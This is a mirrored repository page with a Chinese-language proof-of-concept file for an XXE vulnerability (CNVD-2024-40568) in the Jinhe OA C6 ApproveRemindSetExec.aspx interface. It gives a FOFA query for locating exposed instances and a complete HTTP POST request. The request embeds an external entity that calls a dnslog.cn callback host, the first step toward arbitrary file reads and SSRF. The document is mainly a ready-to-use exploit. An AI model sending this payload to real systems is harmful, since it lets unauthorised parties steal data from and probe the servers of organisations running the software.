admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/金和OA/金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞(CNVD-2024-40568).md

25 lines
823 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞(CNVD-2024-40568)
金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞攻击者可利用xxe漏洞获取服务器敏感数据可读取任意文件以及ssrf攻击存在一定的安全隐患。
## fofa
```javascript
app="金和网络-金和OA"
```
## poc
```javascript
POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://wwwwwwwwwwwwwwww.t07q8o.dnslog.cn"> %remote;]>
```
![image-20241029095818142](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410290958202.png)
Reference in New Issue Copy Permalink